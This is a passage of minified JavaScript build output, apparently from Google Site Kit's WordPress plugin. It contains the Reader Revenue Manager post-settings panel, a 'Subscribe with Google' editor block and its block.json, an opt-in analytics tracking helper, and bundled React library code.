2.253-9.748"}),p.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),p.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),p.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"})))),_=wp.components,v=wp.element;var d=__webpack_require__(540);const{select:y,dispatch:m}=n();function SettingsForm(){const t=y(u).getProductIDs()||[],e=`googlesitekit_rrm_${y(u).getPublicationID()}:productID`,n=y(i).getEditedPostAttribute("meta")?.[e]||"",[r,o]=(0,v.useState)(n),c=""===r?null:(0,a.__)("This will override any other settings you might have applied in Site Kit.","google-site-kit");return(0,d.jsx)(_.SelectControl,{className:"googlesitekit-rrm-panel__select-control",label:(0,a.__)("Decide how site visitors should access this post (if they will see CTAs by Reader Revenue Manager, which you activated via Site Kit):","google-site-kit"),onChange:function(t){o(t),m(i).editPost({meta:{[e]:t}})},value:r,options:[{label:(0,a.__)("Keep the default selection","google-site-kit"),value:""},{label:(0,a.__)("Exclude from Reader Revenue Manager","google-site-kit"),value:"none"},{label:(0,a.__)('Use "open access"',"google-site-kit"),value:"openaccess"},...t.map(t=>{const e=t.split(":"),n=e.length>1?e[1]:t;return{label:(0,a.sprintf)(/* translators: %s: Product ID */ /* translators: %s: Product ID */ (0,a.__)('Use "%s"',"google-site-kit"),n),value:t}})],help:c,__nextHasNoMarginBottom:!0})}var b=__webpack_require__(688),w=__webpack_require__.n(b),k=__webpack_require__(452),S=__webpack_require__.n(k);const x=["body","display","headline","label","title"],A=["small","medium","large"];function Typography({className:t,type:e,size:n,as:r="span",children:o,...i}){return(0,d.jsx)(r,{className:S()("googlesitekit-typography",t,{[`googlesitekit-typography--${e}`]:e&&x.includes(e),[`googlesitekit-typography--${n}`]:n&&A.includes(n)}),...i,children:o})}function SettingPanel(){const t=l.PluginDocumentSettingPanel||f.PluginDocumentSettingPanel;return(0,d.jsx)(t,{className:"googlesitekit-rrm-settings-panel",name:"googlesitekit-rrm-panel",title:(0,a.__)("Google Site Kit","google-site-kit"),icon:(0,d.jsx)(g,{height:"16",width:"16"}),children:(0,d.jsxs)("section",{children:[(0,d.jsx)(Typography,{as:"h3",size:"small",type:"headline",children:(0,a.__)("Reader Revenue Manager","google-site-kit")}),(0,d.jsx)(SettingsForm,{})]})})}Typography.propTypes={className:w().string,type:w().oneOf(x),size:w().oneOf(A),as:w().oneOfType([w().string,w().elementType])};var E=__webpack_require__(243);const T="_googlesitekitDataLayer",L="data-googlesitekit-gtag";function O(t){return function(){t[T]=t[T]||[],t[T].push(arguments)}}const C=new Set(__webpack_require__.g?._googlesitekitBaseData?.enabledFeatures||[]);const R={activeModules:[],isAuthenticated:!1,referenceSiteURL:"",trackingEnabled:!1,trackingID:"",userIDHash:"",userRoles:[]};const{activeModules:j=[],isSiteKitScreen:N,trackingEnabled:I,trackingID:D,referenceSiteURL:z,userIDHash:M,isAuthenticated:W,userRoles:P}=__webpack_require__.g._googlesitekitTrackingData||{},U={activeModules:j,trackingEnabled:I,trackingID:D,referenceSiteURL:z,userIDHash:M,isSiteKitScreen:N,userRoles:P,isAuthenticated:W,pluginVersion:__webpack_require__.g.GOOGLESITEKIT_VERSION},{enableTracking:B,disableTracking:F,isTrackingEnabled:$,initializeSnippet:H,trackEvent:q,trackEventOnce:G}=function(t,e=__webpack_require__.g,n=__webpack_require__.g){const r={...R,...t};r.referenceSiteURL&&(r.referenceSiteURL=r.referenceSiteURL.toString().replace(/\/+$/,""));const o=function(t,e){const n=O(e);let r;const{activeModules:o,referenceSiteURL:i,userIDHash:u,userRoles:a=[],isAuthenticated:c,pluginVersion:f}=t;return function(){const{document:e}=__webpack_require__.g;if(void 0===r&&(r=!!e.querySelector(`script[${L}]`)),r)return!1;r=!0;const l=a?.length?a.join(","):"";n("js",new Date),n("config",t.trackingID,{groups:"site_kit",send_page_view:t.isSiteKitScreen,domain:i,plugin_version:f||"",enabled_features:Array.from(C).join(","),active_modules:o.join(","),authenticated:c?"1":"0",user_properties:{user_roles:l,user_identifier:u}});const s=e.createElement("script");return s.setAttribute(L,""),s.async=!0,s.src=`https://www.googletagmanager.com/gtag/js?id=${t.trackingID}&l=${T}`,e.head.appendChild(s),{scriptTagSrc:`https://www.googletagmanager.com/gtag/js?id=${t.trackingID}&l=${T}`}}}(r,e),i=function(t,e,n,r){const o=O(e);return async function(e,i,u,a){const{trackingEnabled:c}=t;if(!c)return null;n();const f={send_to:"site_kit",event_category:e,event_label:u,value:a};return new Promise(t=>{const n=setTimeout(function(){r.console.warn(`Tracking event "${i}" (category "${e}") took too long to fire.`),t()},1e3);function u(){clearTimeout(n),t()}o("event",i,{...f,event_callback:u}),r._gaUserPrefs?.ioo?.()&&u()})}}(r,e,o,n),u={};return{enableTracking:function(){r.trackingEnabled=!0},disableTracking:function(){r.trackingEnabled=!1},initializeSnippet:o,isTrackingEnabled:function(){return!!r.trackingEnabled},trackEvent:i,trackEventOnce:function(...t){const e=JSON.stringify(t);u[e]||(u[e]=(0,E.once)(i)),u[e](...t)}}}(U);N&&I&&H();var V=__webpack_require__(234);__webpack_require__.n(V)()(__webpack_require__.g);__webpack_require__(523);var K=__webpack_require__(532);__webpack_require__.n(K)()(console.warn);__webpack_require__(91);function ChangeArrow_ChangeArrow({direction:t,invertColor:e,width:n,height:r}){return(0,d.jsx)("svg",{className:S()("googlesitekit-change-arrow",`googlesitekit-change-arrow--${t}`,{"googlesitekit-change-arrow--inverted-color":e}),width:n,height:r,viewBox:"0 0 10 10",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,d.jsx)("path",{d:"M5.625 10L5.625 2.375L9.125 5.875L10 5L5 -1.76555e-07L-2.7055e-07 5L0.875 5.875L4.375 2.375L4.375 10L5.625 10Z",fill:"currentColor"})})}ChangeArrow_ChangeArrow.propTypes={direction:w().string,invertColor:w().bool,width:w().number,height:w().number},ChangeArrow_ChangeArrow.defaultProps={direction:"up",invertColor:!1,width:9,height:9};function Z(){let t=!1,n=null;(0,e.subscribe)(()=>{if(void 0===(0,e.select)(u).getPublicationID())return;if(null===n)return void(n=J());const r=(0,e.select)(i).isSavingPost(),o=(0,e.select)(i).isAutosavingPost();if(t&&!r&&!o){const t=J();if(function(t,e){const n=Object.keys(t),r=Object.keys(e);if(n.length!==r.length)return!0;return n.some(n=>t[n]!==e[n])}(n,t)){const e=Y();q("wpBlockEditor_rrm","change_product_id",function(t){switch(t){case"":return(0,a.__)("Default","google-site-kit");case"none":return(0,a.__)("None","google-site-kit");case"openaccess":return(0,a.__)("Open access","google-site-kit");default:return(0,a.__)("Custom product ID","google-site-kit")}}(t[e])),n={...t}}}t=r})}function Y(){return`googlesitekit_rrm_${(0,e.select)(u).getPublicationID()}:productID`}function J(){const t=(0,e.select)(i).getCurrentPost();if(!t)return{};const n=Y();return{[n]:t.meta?.[n]||""}}const{select:X,resolveSelect:Q}=n();!async function(){if(!!X("core/edit-site"))return;await Promise.all([Q(r).getModules(),Q("core/user").getUser(),Q(u).getSettings()]);let e=X(r).hasModuleOwnership(c);!1===e&&(e=await Q(r).hasModuleAccess(c)),e&&((0,t.registerPlugin)("googlesitekit-rrm-plugin",{render:SettingPanel}),Z())}()})()})();(()=>{var e={192:(e,r,t)=>{"use strict";var n=t(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var i=Symbol.for;o=i("react.element"),i("react.fragment")}var u=n.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,c=Object.prototype.hasOwnProperty,l={key:!0,ref:!0,__self:!0,__source:!0};function a(e,r,t){var n,i={},a=null,s=null;for(n in void 0!==t&&(a=""+t),void 0!==r.key&&(a=""+r.key),void 0!==r.ref&&(s=r.ref),r)c.call(r,n)&&!l.hasOwnProperty(n)&&(i[n]=r[n]);if(e&&e.defaultProps)for(n in r=e.defaultProps)void 0===i[n]&&(i[n]=r[n]);return{$$typeof:o,type:e,key:a,ref:s,props:i,_owner:u.current}}r.jsx=a,r.jsxs=a},362:(e,r,t)=>{"use strict";var n=t(441);function o(){}function i(){}i.resetWarningCache=o,e.exports=function(){function e(e,r,t,o,i,u){if(u!==n){var c=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw c.name="Invariant Violation",c}}function r(){return e}e.isRequired=e;var t={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:r,element:e,elementType:e,instanceOf:r,node:e,objectOf:r,oneOf:r,oneOfType:r,shape:r,exact:r,checkPropTypes:i,resetWarningCache:o};return t.PropTypes=t,t}},403:(e,r,t)=>{"use strict";var n=t(664),o="function"==typeof Symbol&&Symbol.for,i=o?Symbol.for("react.element"):60103,u=o?Symbol.for("react.portal"):60106,c=o?Symbol.for("react.fragment"):60107,l=o?Symbol.for("react.strict_mode"):60108,a=o?Symbol.for("react.profiler"):60114,s=o?Symbol.for("react.provider"):60109,f=o?Symbol.for("react.context"):60110,p=o?Symbol.for("react.forward_ref"):60112,d=o?Symbol.for("react.suspense"):60113,y=o?Symbol.for("react.memo"):60115,_=o?Symbol.for("react.lazy"):60116,b="function"==typeof Symbol&&Symbol.iterator;function h(e){for(var r="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)r+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+r+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var m={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},v={};function g(e,r,t){this.props=e,this.context=r,this.refs=v,this.updater=t||m}function k(){}function w(e,r,t){this.props=e,this.context=r,this.refs=v,this.updater=t||m}g.prototype.isReactComponent={},g.prototype.setState=function(e,r){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(h(85));this.updater.enqueueSetState(this,e,r,"setState")},g.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},k.prototype=g.prototype;var S=w.prototype=new k;S.constructor=w,n(S,g.prototype),S.isPureReactComponent=!0;var O={current:null},j=Object.prototype.hasOwnProperty,E={key:!0,ref:!0,__self:!0,__source:!0};function x(e,r,t){var n,o={},u=null,c=null;if(null!=r)for(n in void 0!==r.ref&&(c=r.ref),void 0!==r.key&&(u=""+r.key),r)j.call(r,n)&&!E.hasOwnProperty(n)&&(o[n]=r[n]);var l=arguments.length-2;if(1===l)o.children=t;else if(1<l){for(var a=Array(l),s=0;s<l;s++)a[s]=arguments[s+2];o.children=a}if(e&&e.defaultProps)for(n in l=e.defaultProps)void 0===o[n]&&(o[n]=l[n]);return{$$typeof:i,type:e,key:u,ref:c,props:o,_owner:O.current}}function R(e){return"object"==typeof e&&null!==e&&e.$$typeof===i}var P=/\/+/g,C=[];function q(e,r,t,n){if(C.length){var o=C.pop();return o.result=e,o.keyPrefix=r,o.func=t,o.context=n,o.count=0,o}return{result:e,keyPrefix:r,func:t,context:n,count:0}}function $(e){e.result=null,e.keyPrefix=null,e.func=null,e.context=null,e.count=0,10>C.length&&C.push(e)}function A(e,r,t,n){var o=typeof e;"undefined"!==o&&"boolean"!==o||(e=null);var c=!1;if(null===e)c=!0;else switch(o){case"string":case"number":c=!0;break;case"object":switch(e.$$typeof){case i:case u:c=!0}}if(c)return t(n,e,""===r?"."+I(e,0):r),1;if(c=0,r=""===r?".":r+":",Array.isArray(e))for(var l=0;l<e.length;l++){var a=r+I(o=e[l],l);c+=A(o,a,t,n)}else if(null===e||"object"!=typeof e?a=null:a="function"==typeof(a=b&&e[b]||e["@@iterator"])?a:null,"function"==typeof a)for(e=a.call(e),l=0;!(o=e.next()).done;)c+=A(o=o.value,a=r+I(o,l++),t,n);else if("object"===o)throw t=""+e,Error(h(31,"[object Object]"===t?"object with keys {"+Object.keys(e).join(", ")+"}":t,""));return c}function T(e,r,t){return null==e?0:A(e,"",r,t)}function I(e,r){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var r={"=":"=0",":":"=2"};return"$"+(""+e).replace(/[=:]/g,function(e){return r[e]})}(e.key):r.toString(36)}function N(e,r){e.func.call(e.context,r,e.count++)}function U(e,r,t){var n=e.result,o=e.keyPrefix;e=e.func.call(e.context,r,e.count++),Array.isArray(e)?B(e,n,t,function(e){return e}):null!=e&&(R(e)&&(e=function(e,r){return{$$typeof:i,type:e.type,key:r,ref:e.ref,props:e.props,_owner:e._owner}}(e,o+(!e.key||r&&r.key===e.key?"":(""+e.key).replace(P,"$&/")+"/")+t)),n.push(e))}function B(e,r,t,n,o){var i="";null!=t&&(i=(""+t).replace(P,"$&/")+"/"),T(e,U,r=q(r,i,n,o)),$(r)}var F={current:null};function L(){var e=F.current;if(null===e)throw Error(h(321));return e}var D={ReactCurrentDispatcher:F,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:O,IsSomeRendererActing:{current:!1},assign:n};r.Children={map:function(e,r,t){if(null==e)return e;var n=[];return B(e,n,null,r,t),n},forEach:function(e,r,t){if(null==e)return e;T(e,N,r=q(null,null,r,t)),$(r)},count:function(e){return T(e,function(){return null},null)},toArray:function(e){var r=[];return B(e,r,null,function(e){return e}),r},only:function(e){if(!R(e))throw Error(h(143));return e}},r.Component=g,r.Fragment=c,r.Profiler=a,r.PureComponent=w,r.StrictMode=l,r.Suspense=d,r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=D,r.cloneElement=function(e,r,t){if(null==e)throw Error(h(267,e));var o=n({},e.props),u=e.key,c=e.ref,l=e._owner;if(null!=r){if(void 0!==r.ref&&(c=r.ref,l=O.current),void 0!==r.key&&(u=""+r.key),e.type&&e.type.defaultProps)var a=e.type.defaultProps;for(s in r)j.call(r,s)&&!E.hasOwnProperty(s)&&(o[s]=void 0===r[s]&&void 0!==a?a[s]:r[s])}var s=arguments.length-2;if(1===s)o.children=t;else if(1<s){a=Array(s);for(var f=0;f<s;f++)a[f]=arguments[f+2];o.children=a}return{$$typeof:i,type:e.type,key:u,ref:c,props:o,_owner:l}},r.createContext=function(e,r){return void 0===r&&(r=null),(e={$$typeof:f,_calculateChangedBits:r,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:s,_context:e},e.Consumer=e},r.createElement=x,r.createFactory=function(e){var r=x.bind(null,e);return r.type=e,r},r.createRef=function(){return{current:null}},r.forwardRef=function(e){return{$$typeof:p,render:e}},r.isValidElement=R,r.lazy=function(e){return{$$typeof:_,_ctor:e,_status:-1,_result:null}},r.memo=function(e,r){return{$$typeof:y,type:e,compare:void 0===r?null:r}},r.useCallback=function(e,r){return L().useCallback(e,r)},r.useContext=function(e,r){return L().useContext(e,r)},r.useDebugValue=function(){},r.useEffect=function(e,r){return L().useEffect(e,r)},r.useImperativeHandle=function(e,r,t){return L().useImperativeHandle(e,r,t)},r.useLayoutEffect=function(e,r){return L().useLayoutEffect(e,r)},r.useMemo=function(e,r){return L().useMemo(e,r)},r.useReducer=function(e,r,t){return L().useReducer(e,r,t)},r.useRef=function(e){return L().useRef(e)},r.useState=function(e){return L().useState(e)},r.version="16.14.0"},441:e=>{"use strict";e.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},452:e=>{!function(){"use strict";var r={}.hasOwnProperty;function t(){for(var e="",r=0;r<arguments.length;r++){var t=arguments[r];t&&(e=o(e,n(t)))}return e}function n(e){if("string"==typeof e||"number"==typeof e)return e;if("object"!=typeof e)return"";if(Array.isArray(e))return t.apply(null,e);if(e.toString!==Object.prototype.toString&&!e.toString.toString().includes("[native code]"))return e.toString();var n="";for(var i in e)r.call(e,i)&&e[i]&&(n=o(n,i));return n}function o(e,r){return r?e?e+" "+r:e+r:e}e.exports?(t.default=t,e.exports=t):"function"==typeof define&&"object"==typeof define.amd&&define.amd?define("classnames",[],function(){return t}):window.classNames=t}()},540:(e,r,t)=>{"use strict";e.exports=t(192)},664:e=>{"use strict";var r=Object.getOwnPropertySymbols,t=Object.prototype.hasOwnProperty,n=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var r={},t=0;t<10;t++)r["_"+String.fromCharCode(t)]=t;if("0123456789"!==Object.getOwnPropertyNames(r).map(function(e){return r[e]}).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach(function(e){n[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var i,u,c=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),l=1;l<arguments.length;l++){for(var a in i=Object(arguments[l]))t.call(i,a)&&(c[a]=i[a]);if(r){u=r(i);for(var s=0;s<u.length;s++)n.call(i,u[s])&&(c[u[s]]=i[u[s]])}}return c}},688:(e,r,t)=>{e.exports=t(362)()},696:(e,r,t)=>{"use strict";e.exports=t(403)}},r={};function __webpack_require__(t){var n=r[t];if(void 0!==n)return n.exports;var o=r[t]={exports:{}};return e[t](o,o.exports,__webpack_require__),o.exports}__webpack_require__.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=(e,r)=>{for(var t in r)__webpack_require__.o(r,t)&&!__webpack_require__.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),(()=>{"use strict";const e=wp.blocks,r=wp.blockEditor,t=wp.components,n=wp.element,o=wp.data,i=googlesitekit.i18n;var u,c=__webpack_require__(452),l=__webpack_require__.n(c),a=__webpack_require__(688),s=__webpack_require__.n(a),f=__webpack_require__(696);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)({}).hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e},p.apply(null,arguments)}const d=e=>f.createElement("svg",p({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),u||(u=f.createElement("g",{fill:"none",fillRule:"evenodd"},f.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),f.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),f.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),f.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))));var y=__webpack_require__(540);function EditorButton({children:e,disabled:r}){return(0,y.jsxs)("button",{disabled:r,className:l()("googlesitekit-blocks-reader-revenue-manager-button",{"googlesitekit-blocks-reader-revenue-manager-button--disabled":r}),children:[(0,y.jsx)(d,{height:"18",width:"18"}),e]})}EditorButton.propTypes={children:s().node.isRequired,disabled:s().bool.isRequired};googlesitekit.data,(0,i.__)("Specific content types","google-site-kit"),(0,i.__)("Specified pages","google-site-kit"),(0,i.__)("Site wide","google-site-kit");s().string.isRequired,s().string.isRequired,s().node.isRequired,s().node.isRequired,s().node.isRequired,s().node.isRequired;const _=JSON.parse('{"UU":"google-site-kit/rrm-subscribe-with-google"}');function Edit(){const e=(0,r.useBlockProps)();return(0,y.jsxs)(n.Fragment,{children:[(0,y.jsx)(r.InspectorControls,{children:(0,y.jsx)("div",{className:"block-editor-block-card",children:(0,y.jsx)(t.Notice,{status:"warning",isDismissible:!1,children:(0,i.__)("This block can only be configured by Site Kit users. Please contact your administrator.","google-site-kit")})})}),(0,y.jsx)("div",{...e,children:(0,y.jsx)("div",{className:"googlesitekit-blocks-reader-revenue-manager",children:(0,y.jsx)(EditorButton,{disabled:!0,children:/* translators: Button label for Subscribe with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L24-L57 (please refer to the latest version of the file) */ /* translators: Button label for Subscribe with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L24-L57 (please refer to the latest version of the file) */ (0,i.__)("Subscribe with Google","google-site-kit")})})})]})}!function(){const r=!!(0,o.select)("core/edit-site");(0,e.registerBlockType)(_.UU,{edit:()=>r?null:(0,y.jsx)(Edit,{}),supports:{inserter:!r}})}()})()})();{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "google-site-kit/rrm-subscribe-with-google", "version": "1.170.0", "title": "Subscribe with Google", "category": "widgets", "icon": "google", "description": "Allow users to subscribe using Reader Revenue Manager to access content behind a paywall.", "textdomain": "google-site-kit", "supports": { "inserter": true } } (()=>{var e={192:(e,t,r)=>{"use strict";var n=r(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var i=Symbol.for;o=i("react.element"),i("react.fragment")}var c=n.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,u=Object.prototype.hasOwnProperty,s={key:!0,ref:!0,__self:!0,__source:!0};function a(e,t,r){var n,i={},a=null,l=null;for(n in void 0!==r&&(a=""+r),void 0!==t.key&&(a=""+t.key),void 0!==t.ref&&(l=t.ref),t)u.call(t,n)&&!s.hasOwnProperty(n)&&(i[n]=t[n]);if(e&&e.defaultProps)for(n in t=e.defaultProps)void 0===i[n]&&(i[n]=t[n]);return{$$typeof:o,type:e,key:a,ref:l,props:i,_owner:c.current}}t.jsx=a,t.jsxs=a},362:(e,t,r)=>{"use strict";var n=r(441);function o(){}function i(){}i.resetWarningCache=o,e.exports=function(){function e(e,t,r,o,i,c){if(c!==n){var u=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw u.name="Invariant Violation",u}}function t(){return e}e.isRequired=e;var r={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:t,element:e,elementType:e,instanceOf:t,node:e,objectOf:t,oneOf:t,oneOfType:t,shape:t,exact:t,checkPropTypes:i,resetWarningCache:o};return r.PropTypes=r,r}},403:(e,t,r)=>{"use strict";var n=r(664),o="function"==typeof Symbol&&Symbol.for,i=o?Symbol.for("react.element"):60103,c=o?Symbol.for("react.portal"):60106,u=o?Symbol.for("react.fragment"):60107,s=o?Symbol.for("react.strict_mode"):60108,a=o?Symbol.for("react.profiler"):60114,l=o?Symbol.for("react.provider"):60109,p=o?Symbol.for("react.context"):60110,f=o?Symbol.for("react.forward_ref"):60112,d=o?Symbol.for("react.suspense"):60113,y=o?Symbol.for("react.memo"):60115,_=o?Symbol.for("react.lazy"):60116,h="function"==typeof Symbol&&Symbol.iterator;function b(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,r=1;r<arguments.length;r++)t+="&args[]="+encodeURIComponent(arguments[r]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var m={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},g={};function v(e,t,r){this.props=e,this.context=t,this.refs=g,this.updater=r||m}function w(){}function k(e,t,r){this.props=e,this.context=t,this.refs=g,this.updater=r||m}v.prototype.isReactComponent={},v.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(b(85));this.updater.enqueueSetState(this,e,t,"setState")},v.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},w.prototype=v.prototype;var S=k.prototype=new w;S.constructor=k,n(S,v.prototype),S.isPureReactComponent=!0;var O={current:null},P=Object.prototype.hasOwnProperty,E={key:!0,ref:!0,__self:!0,__source:!0};function j(e,t,r){var n,o={},c=null,u=null;if(null!=t)for(n in void 0!==t.ref&&(u=t.ref),void 0!==t.key&&(c=""+t.key),t)P.call(t,n)&&!E.hasOwnProperty(n)&&(o[n]=t[n]);var s=arguments.length-2;if(1===s)o.children=r;else if(1<s){for(var a=Array(s),l=0;l<s;l++)a[l]=arguments[l+2];o.children=a}if(e&&e.defaultProps)for(n in s=e.defaultProps)void 0===o[n]&&(o[n]=s[n]);return{$$typeof:i,type:e,key:c,ref:u,props:o,_owner:O.current}}function A(e){return"object"==typeof e&&null!==e&&e.$$typeof===i}var x=/\/+/g,R=[];function M(e,t,r,n){if(R.length){var o=R.pop();return o.result=e,o.keyPrefix=t,o.func=r,o.context=n,o.count=0,o}return{result:e,keyPrefix:t,func:r,context:n,count:0}}function N(e){e.result=null,e.keyPrefix=null,e.func=null,e.context=null,e.count=0,10>R.length&&R.push(e)}function q(e,t,r,n){var o=typeof e;"undefined"!==o&&"boolean"!==o||(e=null);var u=!1;if(null===e)u=!0;else switch(o){case"string":case"number":u=!0;break;case"object":switch(e.$$typeof){case i:case c:u=!0}}if(u)return r(n,e,""===t?"."+T(e,0):t),1;if(u=0,t=""===t?".":t+":",Array.isArray(e))for(var s=0;s<e.length;s++){var a=t+T(o=e[s],s);u+=q(o,a,r,n)}else if(null===e||"object"!=typeof e?a=null:a="function"==typeof(a=h&&e[h]||e["@@iterator"])?a:null,"function"==typeof a)for(e=a.call(e),s=0;!(o=e.next()).done;)u+=q(o=o.value,a=t+T(o,s++),r,n);else if("object"===o)throw r=""+e,Error(b(31,"[object Object]"===r?"object with keys {"+Object.keys(e).join(", ")+"}":r,""));return u}function C(e,t,r){return null==e?0:q(e,"",t,r)}function T(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+(""+e).replace(/[=:]/g,function(e){return t[e]})}(e.key):t.toString(36)}function $(e,t){e.func.call(e.context,t,e.count++)}function W(e,t,r){var n=e.result,o=e.keyPrefix;e=e.func.call(e.context,t,e.count++),Array.isArray(e)?I(e,n,r,function(e){return e}):null!=e&&(A(e)&&(e=function(e,t){return{$$typeof:i,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(e,o+(!e.key||t&&t.key===e.key?"":(""+e.key).replace(x,"$&/")+"/")+r)),n.push(e))}function I(e,t,r,n,o){var i="";null!=r&&(i=(""+r).replace(x,"$&/")+"/"),C(e,W,t=M(t,i,n,o)),N(t)}var U={current:null};function B(){var e=U.current;if(null===e)throw Error(b(321));return e}var L={ReactCurrentDispatcher:U,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:O,IsSomeRendererActing:{current:!1},assign:n};t.Children={map:function(e,t,r){if(null==e)return e;var n=[];return I(e,n,null,t,r),n},forEach:function(e,t,r){if(null==e)return e;C(e,$,t=M(null,null,t,r)),N(t)},count:function(e){return C(e,function(){return null},null)},toArray:function(e){var t=[];return I(e,t,null,function(e){return e}),t},only:function(e){if(!A(e))throw Error(b(143));return e}},t.Component=v,t.Fragment=u,t.Profiler=a,t.PureComponent=k,t.StrictMode=s,t.Suspense=d,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=L,t.cloneElement=function(e,t,r){if(null==e)throw Error(b(267,e));var o=n({},e.props),c=e.key,u=e.ref,s=e._owner;if(null!=t){if(void 0!==t.ref&&(u=t.ref,s=O.current),void 0!==t.key&&(c=""+t.key),e.type&&e.type.defaultProps)var a=e.type.defaultProps;for(l in t)P.call(t,l)&&!E.hasOwnProperty(l)&&(o[l]=void 0===t[l]&&void 0!==a?a[l]:t[l])}var l=arguments.length-2;if(1===l)o.children=r;else if(1<l){a=Array(l);for(var p=0;p<l;p++)a[p]=arguments[p+2];o.children=a}return{$$typeof:i,type:e.type,key:c,ref:u,props:o,_owner:s}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:p,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:l,_context:e},e.Consumer=e},t.createElement=j,t.createFactory=function(e){var t=j.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:f,render:e}},t.isValidElement=A,t.lazy=function(e){return{$$typeof:_,_ctor:e,_status:-1,_result:null}},t.memo=function(e,t){return{$$typeof:y,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return B().useCallback(e,t)},t.useContext=function(e,t){return B().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return B().useEffect(e,t)},t.useImperativeHandle=function(e,t,r){return B().useImperativeHandle(e,t,r)},t.useLayoutEffect=function(e,t){return 